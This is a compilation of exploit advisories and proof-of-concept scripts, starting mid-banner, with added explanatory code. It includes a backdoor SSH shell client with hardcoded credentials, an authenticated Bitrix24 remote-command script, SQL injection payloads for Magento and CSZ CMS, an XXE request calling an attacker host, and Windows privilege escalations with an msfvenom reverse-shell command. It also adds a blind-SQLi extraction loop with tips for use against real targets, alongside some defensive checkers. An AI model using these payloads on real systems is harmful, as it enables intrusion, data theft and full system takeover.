      ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █· ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄ ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌ ·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀ ▀▄ █·▪ ▪ •██
      ▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪ ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌· ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ · ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
      ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ ▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀
      '''

      print(bnr)

      if len(baaaaaah.argv) < 2:
          print('--Gief me an IP.')
          exit(0)

      adrs = baaaaaah.argv[1]
      unme = 'usr'
      pwrd = 'www.usr.cn'

      rsh = bah.SSHClient()
      rsh.set_missing_host_key_policy(bah.AutoAddPolicy())

      try:
          rsh.connect(adrs, username=unme, password=pwrd, port=2222) #22 Ook.
          print('--Got rewt!')
      except:
          print('--Backdoor removed.')
          exit(-1)

      while True:
          cmnd = input('# ')
          if cmnd == 'exit':
              rsh.exec_command('exit')
              break
          stdin, stdout, stderr = rsh.exec_command(cmnd)
          print(stdout.read().decode().strip())

      rsh.close()
  17. # Exploit Title: WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
      # Google Dork: -
      # Date: 2022-03-13
      # Exploit Author: Roel van Beurden
      # Vendor Homepage: -
      # Software Link: https://downloads.wordpress.org/plugin/advanced-uploader.4.2.zip
      # Version: <=4.2
      # Tested on: WordPress 5.9 on Ubuntu 18.04
      # CVE: CVE-2022-1103

      1. Description:
      ----------------------
      WordPress Plugin Advanced Uploader <=4.2 allows authenticated arbitrary file upload. Any file(type) can be uploaded. A malicious user can perform remote code execution on the backend webserver.

      2. Proof of Concept:
      ----------------------
      - Upload file/webshell/backdoor with the Advanced Uploader plugin;
      - File is uploaded in the Wordpress Media Library;
      - Go to /wp-content/uploads/ where the file is saved;
      - Click on the uploaded file for whatever it's supposed to do (RCE, reverse shell).

      3. Exploitation demo:
      ----------------------
      https://www.youtube.com/watch?v=Bwpf-IpxtXQ
# Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi
# Date: 2021-4-21
# Exploit Author: Aydin Naserifard
# Vendor Homepage: https://www.adobe.com/
# Software Link: https://github.com/magento/magento2/releases/tag/2.3.5-p2
# Version: [2.3.5-p2]
# Tested on: [2.3.5-p2]

POC:

1) PUT /rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23

2) POST /cargo/index/validateqty [quote_id parameter]
quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23
# Exploit Title: Bookeen Notea - Directory Traversal
# Date: December 2021
# Exploit Author: Clement MAILLIOUX
# Vendor Homepage: https://bookeen.com/
# Software Link: N/A
# Version: BK_R_1.0.5_20210608
# Tested on: Bookeen Notea (Android 8.1)
# CVE: CVE-2021-45783

# The affected version of the Bookeen Notea system update is prone to a directory traversal vulnerability in its note Export function.
# The vulnerability can be triggered as follows:
# - Create a note or use an existing note on the device
# - Rename this note ../../../../../../
# - Keep touching (long-press) the note until a menu appears
# - Select "Export"
# - Touch "View"
# You can now access and explore the device filesystem.
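The note name is joined onto the export directory unchecked, so a name made of ../ segments resolves to the filesystem root. Below is an added example (written for this page, not the Notea firmware's code) that shows the unsafe join next to a hardened version, using the advisory's note name as one of the inputs. The export directory path is an assumption; the advisory does not name it.

```python
import posixpath

# Assumed export directory on the device; the advisory does not name it.
EXPORT_ROOT = "/sdcard/Notea/export"


def unsafe_export_path(root, note_name):
    """The vulnerable pattern: the note name is joined onto the export root unchecked."""
    return posixpath.normpath(posixpath.join(root, note_name))


def safe_export_path(root, note_name):
    """Map a user-chosen note name onto a file strictly inside root, or raise ValueError.

    Three layers: reject NUL and separators in the name, then normalize, then prove
    with commonpath that the result is still under root (a plain string-prefix test
    would wrongly accept a sibling such as /sdcard/Notea/export2).
    """
    if not note_name or "\x00" in note_name:
        raise ValueError("empty or NUL-containing name")
    if "/" in note_name or "\\" in note_name:
        raise ValueError("directory separator in note name")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, note_name))
    if candidate == root or posixpath.commonpath([root, candidate]) != root:
        raise ValueError("path escapes export root")
    return candidate


def is_rejected(note_name, root=EXPORT_ROOT):
    """True when the hardened version refuses the name."""
    try:
        safe_export_path(root, note_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed note names, including the one from the advisory.
    for name in ["shopping list.txt", "../../../../../../", "..", "../etc/hosts", "notes"]:
        print(repr(name), "unsafe ->", unsafe_export_path(EXPORT_ROOT, name),
              "| safe ->", "rejected" if is_rejected(name) else safe_export_path(EXPORT_ROOT, name))
```

Run it and the advisory's name ../../../../../../ comes out of the unsafe join as "/", which is exactly why the export viewer then shows the whole device; the hardened version refuses it before any file is opened.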
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os

#!/usr/bin/env python3
# Created by heinjame
import argparse
import re
import requests
from bs4 import BeautifulSoup

user_agent = {'User-agent': 'HeinJame'}

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Bitrix URL, e.g. https://bitrix.example.com")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("password", help="Bitrix Password")
pargs = parser.parse_args()

url = pargs.host.rstrip("/")
username = pargs.uname
password = pargs.password

s = requests.Session()

def login():
    # Standard Bitrix login form; the Session object keeps the resulting cookie.
    postdata = {'AUTH_FORM': 'Y', 'TYPE': 'AUTH', 'backurl': '%2Fstream%2F',
                'USER_LOGIN': username, 'USER_PASSWORD': password}
    s.post(url + "/stream/?login=yes", headers=user_agent, data=postdata)

def getsessionid():
    # The admin "PHP command line" page embeds the CSRF token as 'bitrix_sessid': '...'
    # (the console is an administrative feature, so the account must have admin rights).
    page = s.get(url + "/bitrix/admin/php_command_line.php?lang=en", headers=user_agent)
    session = re.search(r"'bitrix_sessid':.*", page.text)
    extract = session.group(0).split(":")
    realdata = extract[1].strip(" ")
    realdata = realdata.replace("'", "").replace(",", "")
    return realdata

def cmdline(cmd, sessionid):
    # Runs system(<cmd>) through the built-in PHP console and prints the output.
    cmdline = {'query': "system('" + cmd + "');", 'result_as_text': 'n', 'ajax': 'y'}
    usercmd = s.post(url + "/bitrix/admin/php_command_line.php?lang=en&sessid=" + sessionid,
                     headers=user_agent, data=cmdline)
    soup = BeautifulSoup(usercmd.content, 'html.parser')
    result = soup.find('p').getText()
    print(result.rstrip())

login()
sessionid = getsessionid()
inputcmd = input(">>")
while inputcmd != "exit":
    cmdline(inputcmd, sessionid)
    inputcmd = input(">>")
# Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi
# Date: 2021-04-22
# Exploit Author: Dogukan Dincer
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download
# Version: 1.3.0
# Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4

# Discovery of Vulnerability
- First go to the CSZ CMS web page
- Then go to the http://yourhost/plugin/article directory on the CMS.
- To see the error-based SQLi, enter the ' character in the search field.
- The "p" parameter is the one that is injectable.
- The database can be accessed with manual or automated tools.

# Proof of Concept
http://127.0.0.1/csz-cms/plugin/article/search?p=1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

# Sqlmap output:
Parameter: p (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: p=1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=8555,1))),0x716a717a71))-- OUUO

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS
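Both the Magento payloads and the CSZ CMS time-based payload above extract data the same way: one request per question, answered by whether the server sleeps. The Magento PoC asks a single question (is the third byte of database() equal to 100, i.e. 'd'); what a tester actually wants is the loop that turns that into the whole string, and the binary-search variant that cuts the request count from up to 95 per byte to 7. The following is an added example written for this page, not code from either advisory: the target is simulated in-process (a constructed oracle that sleeps instead of a live server), so it runs offline; `payload()` reproduces the Magento fragment for any position and comparison.

```python
import time


def payload(position, op, value, delay=5):
    """The SQL fragment the Magento PoC injects, generalized to any position/comparison."""
    return f"if(ascii(substring(database(),{position},1)){op}{value},sleep({delay}),0)"


class SimulatedTarget:
    """Stand-in for the vulnerable endpoint (constructed for the example, no network).

    query() answers the injected condition the way the real server would: by
    sleeping when it is true. A real oracle would send the request and compare
    the round-trip time against the sleep value.
    """
    def __init__(self, secret, delay=0.0):
        self.secret = secret      # e.g. the database() name the attacker is after
        self.delay = delay        # seconds; 0 keeps the example fast
        self.requests = 0

    def query(self, position, op, value):
        self.requests += 1
        # MySQL: substring() past the end yields '' and ascii('') is 0
        ch = ord(self.secret[position - 1]) if position <= len(self.secret) else 0
        cond = {"=": ch == value, ">": ch > value}[op]
        if cond:
            time.sleep(self.delay)
        return cond


def extract_linear(oracle, position, alphabet=range(32, 127)):
    """One '=' probe per candidate byte, as in the PoC (ascii(...)=100 tests for 'd')."""
    for v in alphabet:
        if oracle.query(position, "=", v):
            return chr(v)
    return None   # no printable match: end of string


def extract_binary(oracle, position, lo=0, hi=127):
    """Binary search with '>' probes: 7 requests per byte for 7-bit ASCII instead of up to 95."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.query(position, ">", mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo) if lo else None   # ascii 0 means past the end of the string


def dump_string(oracle, extractor, max_len=64):
    """Walk positions 1..max_len until the extractor reports the end of the string."""
    out = []
    for pos in range(1, max_len + 1):
        ch = extractor(oracle, pos)
        if ch is None:
            break
        out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    print(payload(3, "=", 100))
    for name, extractor in (("linear", extract_linear), ("binary", extract_binary)):
        t = SimulatedTarget("magento_db")
        print(name, dump_string(t, extractor), "in", t.requests, "requests")
```

Against a real target, replace `SimulatedTarget.query` with a function that builds the request from `payload()` and returns `elapsed >= delay`; keep the delay comfortably above network jitter, and retry a positive result once before trusting it, since a slow unrelated response looks identical to a true condition.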
# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE: CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md

curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
  --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
  https://example.com/biprws/logon/long
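The body in that curl command carries no data at all; everything it does happens in the DTD. The parameter entity `%remote;` makes the parser fetch a DTD from the attacker's host, and `%int;` / `%trick;` are entities that remote DTD is expected to define (the classic out-of-band chain). Because the SYSTEM identifier is a UNC path and the target was tested on Windows, a successful fetch is also an outbound SMB connection, which can carry the service account's NetNTLM authentication to the attacker. A logon request never needs a DTD, so the simplest server-side fix is to refuse any body that has one before a parser sees it. The following added example (written for this page, not SAP's code) implements that gate over the advisory's own request body; the benign logon body is a constructed stand-in, not the real biprws schema.

```python
import re
import xml.etree.ElementTree as ET

# The request body from the curl command above (copied into the example as a constant).
XXE_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE root [<!ENTITY % remote SYSTEM "\\\\attackerwebsite.com\\XXE\\example">'
    b'%remote;%int;%trick;]>'
)
# A constructed, benign logon body; the real biprws schema is not reproduced here.
BENIGN_BODY = b'<?xml version="1.0"?><attrs><attr name="userName">alice</attr></attrs>'

COMMENT = re.compile(rb"<!--.*?-->", re.DOTALL)
DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
EXT_ENTITY = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAM_ENTITY_REF = re.compile(rb"%\w+;")


def dtd_findings(body):
    """List why a body should be refused before it reaches an XML parser ([] = nothing found).

    Conservative by design: any DOCTYPE is refused, since a logon request never needs
    a DTD, and that single rule removes external entities, parameter entities and
    entity-expansion attacks at once. Comments are stripped first so a DOCTYPE
    mentioned inside one is not a false positive.
    """
    stripped = COMMENT.sub(b"", body)
    findings = []
    if DOCTYPE.search(stripped):
        findings.append("DOCTYPE declaration present")
    if EXT_ENTITY.search(stripped):
        findings.append("external (SYSTEM/PUBLIC) entity declaration")
    if PARAM_ENTITY_REF.search(stripped):
        findings.append("parameter entity reference")
    return findings


def parse_logon_body(body):
    """Gate first, then parse. ElementTree's expat does not fetch external entities,
    but refusing DTDs up front means the request never depends on parser settings."""
    problems = dtd_findings(body)
    if problems:
        raise ValueError("rejected XML: " + "; ".join(problems))
    return ET.fromstring(body)


def is_rejected(body):
    """True when the gate refuses the body."""
    try:
        parse_logon_body(body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("PoC body:", dtd_findings(XXE_BODY))
    print("benign body root:", parse_logon_body(BENIGN_BODY).tag)
```

Where the parser cannot be fronted by such a gate (a Java stack like the one BusinessObjects runs on), the equivalent is disabling DOCTYPE declarations and external general and parameter entities in the parser factory itself; the detection side is the same regex set run over request logs or a WAF rule, since the PoC's `<!ENTITY % ... SYSTEM` pattern has no legitimate reason to appear in a logon call.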
# Exploit Title: UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea // https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-24
# Vendor Homepage: https://www.zte.com.cn/global/
# Tested Version: 2.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64

# Step to discover the Unquoted Service Path:

C:\Users\edgar>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
UDisk Monitor Z5 Phone    UDisk Monitor Z5 Phone    C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe    Auto

C:\Users\edgar>sc qc "UDisk Monitor Z5 Phone"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UDisk Monitor Z5 Phone
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : UDisk Monitor Z5 Phone
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\edgar>systeminfo
Host Name:                 DESKTOP-810865D
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19044 N/A Build 19044
# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path
# Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg
# Discovery Date: 2022-04-25
# Vendor Homepage: https://itec.es/programas/
# Vulnerability Type: Unquoted Service Path Privilege Escalation
# Tested on OS: Microsoft Windows 11 Home

To exploit this vulnerability, a local attacker must place an executable at one of the paths Windows tries before the real binary (for the path below, C:\Program.exe or C:\Program Files.exe), which requires write access to that directory. On the next service restart or system reboot the planted binary runs with the service's privileges, here LocalSystem.

C:\Users\edgar>sc qc "ITeCProteccioAppServer"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ITeCProteccioAppServer
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ITeCProteccioAppServer
        DEPENDENCIES       : RPCSS
        SERVICE_START_NAME : LocalSystem

C:\Users\edgar>systeminfo
Host Name:                 DESKTOP-0DL5SID
OS Name:                   Microsoft Windows 11 Home
OS Version:                10.0.22000 N/A Build 22000
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit
# Note: The application folder "Wondershare Dr.Fone" may be named differently (e.g. "drfone" when the installer is downloaded from the Italian website)

# Description:
The application "Wondershare Dr.Fone" comes with 3 services:
1. DFWSIDService
2. ElevationService
3. Wondershare InstallAssist

All the folders that contain the services' binaries have weak permissions. These weak permissions allow any authenticated user to replace the binaries and obtain SYSTEM privileges.

First, check that the services are running:

wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare

Wondershare WSID help                    DFWSIDService              C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe                        Auto  LocalSystem  Running
Wondershare Driver Install Service help  ElevationService           C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe   Auto  LocalSystem  Running
Wondershare Install Assist Service       Wondershare InstallAssist  C:\ProgramData\Wondershare\Service\InstallAssistService.exe                                    Auto  LocalSystem  Running

Now check whether we have enough privileges to replace the binaries:

icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
Everyone:(OI)(CI)(F)    <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
...

icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
Everyone:(I)(OI)(CI)(F)    <= same here
...

icacls "C:\ProgramData\Wondershare\Service"
Everyone:(I)(OI)(CI)(F)    <= and here
...

# Proof of Concept:
1. Create an exe file with the name of the binary to replace (e.g. WsidService.exe to exploit the service "Wondershare WSID help")
2. Put it in the service's folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait for the next reboot (unless the service can be restarted manually). A running service executable cannot be overwritten in place because its image is locked, but with Full Access on the folder the original can be renamed and the payload dropped under the original name.

As a proof of concept we can generate a simple reverse shell with msfvenom and use netcat as the listener:

simple payload:
msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe

listener:
nc -nlvp <YOUR_PORT>
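The three Windows advisories above (the two unquoted service paths and the Dr.Fone folder permissions) are found with the same two questions: which paths would CreateProcess try before the real service binary, and can a low-privileged principal write where the binary lives. The following is an added example written for this page, not code from any of the advisories: it derives the hijack candidates from an unquoted ImagePath in the order Windows tries them, and parses icacls output to report write-capable ACEs for principals every local user belongs to. The service list and the icacls excerpts are constructed from the advisories' output, not live data; the hardened folder listing is an assumption of what a correctly installed Program Files directory looks like.

```python
import re

# Constructed from the wmic/sc output shown in the three advisories above
# (service name, ImagePath as reported, account); not live data.
SERVICES = [
    ("UDisk Monitor Z5 Phone", r"C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe", "LocalSystem"),
    ("ITeCProteccioAppServer", r"C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe", "LocalSystem"),
    ("DFWSIDService", r"C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe", "LocalSystem"),
    ("Spooler", r'"C:\Windows\System32\spoolsv.exe"', "LocalSystem"),
]

# Constructed icacls output for the Dr.Fone folder, shaped like the advisory's excerpt.
ICACLS_DRFONE = r"""
C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone Everyone:(OI)(CI)(F)
                                                       NT SERVICE\TrustedInstaller:(I)(F)
                                                       NT AUTHORITY\SYSTEM:(I)(F)
                                                       BUILTIN\Administrators:(I)(F)
                                                       BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
# Assumed listing of a correctly installed Program Files folder (constructed).
ICACLS_HARDENED = r"""
C:\Program Files (x86)\Example NT SERVICE\TrustedInstaller:(I)(F)
                                NT AUTHORITY\SYSTEM:(I)(F)
                                BUILTIN\Administrators:(I)(F)
                                BUILTIN\Users:(I)(RX)
                                CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals any local user belongs to, matched on the last component of the name.
LOW_PRIV_PRINCIPALS = {"Everyone", "Users", "Authenticated Users", "INTERACTIVE"}
# icacls simple and specific rights that let the holder change, replace or delete content.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "DC", "D"}


def hijack_candidates(image_path):
    """Paths CreateProcess tries before the real binary when the ImagePath is unquoted
    and contains spaces, in the order Windows tries them ([] if quoted or space-free)."""
    p = image_path.strip()
    if p.startswith('"'):
        return []
    m = re.match(r"(.+?\.exe)(\s|$)", p, re.IGNORECASE)   # drop any arguments after the exe
    exe = m.group(1) if m else p
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def parse_icacls(output, path):
    """Return (principal, [flags...]) pairs from `icacls <path>` output; path is stripped from line 1."""
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        if ":(" not in line:
            continue          # blank line or the "Successfully processed" trailer
        principal, _, aces = line.partition(":(")
        entries.append((principal.strip(), re.findall(r"\(([^)]*)\)", "(" + aces)))
    return entries


def weak_aces(output, path):
    """(principal, rights) pairs where a low-privileged group can modify the folder's content."""
    findings = []
    for principal, flags in parse_icacls(output, path):
        if principal.split("\\")[-1] not in LOW_PRIV_PRINCIPALS:
            continue
        rights = set()
        for f in flags:
            rights.update(f.split(","))      # specific rights come as "(RX,W)"
        bad = sorted(rights & WRITE_RIGHTS)
        if bad:
            findings.append((principal, bad))
    return findings


if __name__ == "__main__":
    for name, image, account in SERVICES:
        cands = hijack_candidates(image)
        if cands:
            print(f"{name} ({account}): unquoted path, hijack candidates: {cands}")
    folder = r"C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
    print("Dr.Fone folder weak ACEs:", weak_aces(ICACLS_DRFONE, folder))
    print("hardened folder weak ACEs:", weak_aces(ICACLS_HARDENED, r"C:\Program Files (x86)\Example"))
```

The two checks belong together because an unquoted path is only exploitable when one of its candidate locations is writable: for the two unquoted-path advisories the candidates are C:\Program.exe and C:\Program Files.exe, and standard users cannot create files directly under C:\ on a default install, so `weak_aces` run over `icacls C:\` is what decides whether the finding is an escalation or a hardening note. The Dr.Fone case is the opposite shape, a correctly quoted path in a folder where Everyone has Full control, which is why no path trick is needed there at all.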